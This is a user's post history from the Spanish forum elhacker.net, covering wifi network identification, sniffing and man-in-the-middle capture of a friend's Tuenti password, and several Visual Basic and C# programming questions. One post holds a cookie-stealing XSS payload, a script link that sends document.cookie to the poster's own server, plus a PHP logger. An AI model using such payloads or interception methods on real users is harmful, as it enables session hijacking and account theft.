elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Security Series.XSS. [Cross Site Scripting]


  Mostrar Temas
Páginas: [1] 2
1  Seguridad Informática / Hacking Wireless / Redes TELECABLE-XXXXXX en: 18 Agosto 2014, 10:15 am
Estoy veraneando por el Levante español y me he encontrado muchísimas redes de este estilo: TELECABLE-XXXXXX

He estado buscando información y la verdad es que no he encontrado nada de información por Internet.

Me he puesto manos a la obra y he descubierto algunas cosas:
* En la mayoría de las redes que he observado, los 6 caracteres del Essid coinciden con los últimos números de la MAC
* Hay algunos casos que no cumplen lo anterior, o el Essid y la MAC no se parecen en nada, o la última pareja de números del Essid es una unidad mayor que los últimos de la MAC
* Observando la MAC de los APs, casi la mitad de los que he visto son E8:94:F6:XX:XX:XX, pero no he dado ni con la marca ni el modelo del router.

Hoy saldré a ver si veo alguna relación entre las MACs y los que tienen el WPS activo.

Alguien sabe algo acerca de estas redes? La verdad es que tampoco sé cuál es el ISP de estas redes, pero me ha llamado la atención el gran número que hay y la poca información al respecto.

Un saludo.
2  Programación / .NET (C#, VB.NET, ASP) / Problema con SendKeys C# en: 22 Octubre 2011, 18:04 pm
Hola!! Me he descargado una aplicación de ejemplo de un cliente que utiliza socket. Lo único que le he añadido ha sido ésto:
Código:
                    switch (sRecieved)
                    {
                        case "\na":
                            SendKeys.Send("algo");
                            break;
                        case "\nb":
                            SendKeys.Send("b");
                            break;
                    }
sRecieved es un string dónde se almacenan los datos que recive el socket. El caso es que la aplicación se cierra sin dar error ni nada.

¿Alguna idea? Os dejo aquí el código que estoy utilizando. http://www.mediafire.com/?l62u2w859gx55dg

Gracias!!
3  Seguridad Informática / Hacking Wireless / Identificar red en: 11 Marzo 2011, 12:33 pm
Os cuento. Tengo un vecino, amigo mío, que se ha jugado una cena conmigo.

El caso es que él se conecta a irternet utilizando una conexión inalámbrica con cifrago WEP  :xD La apuesta se trata de que averigüe, cuál de todas las redes del edificio es la suya.

¿Se os ocurre alguna manera? A mi se me han ocurrido dos:
-Cutre: poner a capturar paquetes, ver la lista de asociados a cada red e intentar mediante msn, tuenti, facebook o algo similar, viendo las horas, quien es...
-La ilegal: sacar una a una cada clave WEP de las que pille, hacer un MiTM hasta que dé con él.

Gracias!!
4  Seguridad Informática / Hacking Wireless / Captura de datos. en: 3 Junio 2010, 11:57 am
Hola! El otro día me puse a hacer pruebas en casa y más que conclusiones saqué un montón de dudas.

Planteamiento.
Sé que una manera de monitorizar una red y obtener datos del tráfico que viaja por ella es conectarse a una red, y desde dentro hacer un ataque Man in the middle a un cliente y capturar su tráfico.

La duda que me surgió fue, ¿puedo hacer eso mismo si entrar en la red? Para ello configuré mi AP como libre acceso (quité la cifrado), con un ordenador me puse a generar tráfico, con otro me puse a caturar datos de mi red con airodump, filtrando sólo la red y el cliente que me interesaban.

Resultados.
El caso es que pese a capturar un gran volumen de datos, a la hora de analizar la información lo que obtuve era poco útil, un par de imágenes, un par de peticiones http y extractos de una conversación Jabber.

En cambio con el ataque Man in the middle, capturé absolutamente todo lo que hice en la red.

¿Hice algo mal?, ¿alguien conoce el porqué?

Saludos y gracias!!!
5  Seguridad Informática / Hacking / [Práctica] Ataque a ciegas. en: 1 Junio 2010, 20:34 pm
Lo primero es pedir perdón por lo abstracto del título, pero es que no sabía muy bien qué poner...

PLANTEAMIENTO
El otro día estaba con un amigo (y vecino) y vi que siempre se conecta a Tuenti utilizando la versión tuenti-móvil. Le dije que tuviera cuidado que no era segura (la clave se manda en texto plano, en lugar de en SSL como para con su hermano mayor). El caso es que se rió de mi y me retó a conseguir su contraseña.

Ambos somos vecinos y me confirmó que en mi casa llega la señal de su red wifi, el problema es que también llegan otras 20 redes y no sé cuál es la suya. Obtener la contraseña no es ningún problema práctico (ya lo he hecho con otras redes con fines educativos) ni moral (se lo pregunté y me dió permiso).

El problema es que no sé por dónde empezar...

INTENTOS
Puedo ver, más o menos, cuándo está conectado mirando su estado de Tuenti, por lo que me he puesto a mirar los clientes conectados a las distintas redes que llegan a mi casa con airodump, pero no estoy seguro de cuál es él.

Lo que se me ocurrió fue hablar con él utilizando el chat del tuenti para ver si podía obtener su IP. Simplemente me puse a hablar con él y a capturar con Wireshark, pero la IP (y la MAC) de orgen corresponden a un servidor de Tuenti (lo comprobé con Whois).

¿Alguien puede indicarme por dónde meterle mano al asunto?

Un saludo!!
6  Comunicaciones / Hacking Mobile / Comandos AT en: 6 Marzo 2008, 14:29 pm
Tengo un Siemens S35i, que soporta comandos AT. Me he bajado el manual y he intentado comunicarme utilizando el hyperterminal de windows.

El resultado es que escribo en la terminal (con el eco activado), pero no obtengo ningún tipo de respuesta. ¿Cuál puede ser la causa?

La configuración que uso en la hyperterminal es todo por defecto, salvo la velocidad que he puesto 9600 (he probado también con 2400) y lo del eco.
7  Seguridad Informática / Nivel Web / Ayuda con XSS en: 28 Noviembre 2007, 12:56 pm
He estado leyendo en el foro sobre XSS (indirecta) y me he puesto a hacer mis pruebas. Durante éstas estoy intentando capturar cookies.
Para ello:
-He creado un script en php y lo he colocado en mi server que crea un TXT y guarda la información de la cookie.
-Mando un email con un hipervínculo a la url vulnerable+script.
El problema es que no recibo nada no sé si falla el código del script de mi server, el que coloco en el hipervínculo o que la url ha dejado de ser vulnerable. ¿Mepodéis echar una mano? GRACIAS

Adjuntos:
Mi script PHP
Código:
<?
$fp = fopen("captura.txt","a");
fputs($fp, $cookie);
fclose($fp);
echo "<script>window.location=http://www.google.com</script>";
?>

Lo que pongo en el hipervínculo:
Código:
http://www.servidorvulnerable.../.../...=<script>window.location='http://miserver.com/script.php?cookie='+document.cookie</script>
8  Programación / Scripting / Regular Expressions Syntax en: 14 Noviembre 2007, 16:16 pm
Estoy modificando un script, he mirado en la documentación y decin que todo se puede hacer con las Regular Expressions Syntax, he mirado en éste link la documentación y me está resultando muy difícil.
Éste es el trozo código:
Código:
<action type="SubMenu">
<url><![CDATA[^http://www.dr.dk/.*wmp]]></url>
<linkpattern>
<pattern><![CDATA[<tr>[^<>]*?<td[^>]*?>(?P<title>[^\<\>]*?)\<[^\n]*[\r\n]*[^\n]*?href="(?P<url>[^"]*?64\.asx)"]]></pattern>
<titleformat><![CDATA[64: \g<title>]]></titleformat>
</linkpattern>
<linkpattern>
<pattern><![CDATA[<tr>[^<>]*?<td[^>]*?>(?P<title>[^\<\>]*?)\<[^\n]*[\r\n]*[^\n]*?href="(?P<url>[^"]*?128\.asx)"]]></pattern>
<titleformat><![CDATA[128: \g<title>]]></titleformat>
</linkpattern>
</action>
Lo que quiero hacer es dirigirlo a otra web (en concreto una que haga yo)y en lugar de eso, habra los contenidos que yo le ponga. Es decir, en lugar de que busque los link que hay en esa web, los busque en la mía y los cargue.

GRACIAS!!!
9  Programación / Programación Visual Basic / Webcam en: 10 Septiembre 2007, 00:14 am
He encontrado un código en internet que me permite capturar el contenido de una webcam. El caso es que el video lo muestra en un PictureBox. El problema es que si capturo el video a 320x240 independientemente del tamaño del PictureBox el video se muestra a ese tamaño. ¿Conocéis alguna manera de redimensionarlo (vamos, hacerle un zoom)?
Gracias.

PD: os dejo el código de la captura por si os es útil.
Código:
'Declaraciones:
Const ws_visible = &H10000000
Const ws_child = &H40000000
Const WM_USER = 1024
Const WM_CAP_EDIT_COPY = WM_USER + 30
Const wm_cap_driver_connect = WM_USER + 10
Const wm_cap_set_preview = WM_USER + 50
Const wm_cap_set_overlay = WM_USER + 51
Const WM_CAP_SET_PREVIEWRATE = WM_USER + 52
Const WM_CAP_SEQUENCE = WM_USER + 62
Const WM_CAP_SINGLE_FRAME_OPEN = WM_USER + 70
Const WM_CAP_SINGLE_FRAME_CLOSE = WM_USER + 71
Const WM_CAP_SINGLE_FRAME = WM_USER + 72
Const DRV_USER = &H4000
Const DVM_DIALOG = DRV_USER + 100
Const PREVIEWRATE = 30

Private Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lparam As Long) As Long
Private Declare Function capCreateCaptureWindow Lib "avicap32.dll" Alias "capCreateCaptureWindowA" (ByVal a As String, ByVal b As Long, ByVal c As Integer, ByVal d As Integer, ByVal e As Integer, ByVal f As Integer, ByVal g As Long, ByVal h As Integer) As Long

Dim hwndc As Long
'Declaro la función GetPixel
Private Declare Function GetPixel Lib "gdi32" ( _
    ByVal hdc As Long, _
    ByVal X As Long, _
    ByVal Y As Long) As Long

Private Sub Command1_Click()
'Código que realiza la captura de la imagen:

temp = SendMessage(hwndc, WM_CAP_EDIT_COPY, 1, 0)
Set Picture1.Picture = Clipboard.GetData
'Guardo la imagen para ver las dimensiones
SavePicture Picture1.Picture, "c:\imagen.jpg"

End Sub


Private Sub Form_Load()
'Código que activa la captura de imágenesse supone un formulario con 2 picture llamados "picture1" y "picture2")

hwndc = capCreateCaptureWindow("Ventana de Captura", ws_child Or ws_visible, 0, 0, Picture2.Width, Picture2.Height, Picture2.hwnd, 0)
If (hwndc <> 0) Then
temp = SendMessage(hwndc, wm_cap_driver_connect, 0, 0)
temp = SendMessage(hwndc, wm_cap_set_preview, 1, 0)
temp = SendMessage(hwndc, WM_CAP_SET_PREVIEWRATE, PREVIEWRATE, 0)
End If


End Sub
10  Programación / Programación Visual Basic / Shell en: 28 Junio 2007, 12:45 pm
En mi rpograma tilizo la función shell para ejecutar comandos de msdos, la mayoría de los que he probado funcionan perfectamente excepto el copy.

Si pongo:
Código:
Shell "copy C:\Untitled.wmv J:\"

Me da error 53, no se ha encontrado el archivo, pero el archivo está, porque si pongo el mismo comando en la línea de comandos de windows sí que me lo hace.

He visto que el vb tiene una función propia para la copia de archivos pero es mucho más lenta. ¿Alguien sabe por qué no me funciona?
Gracias
Páginas: [1] 2
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines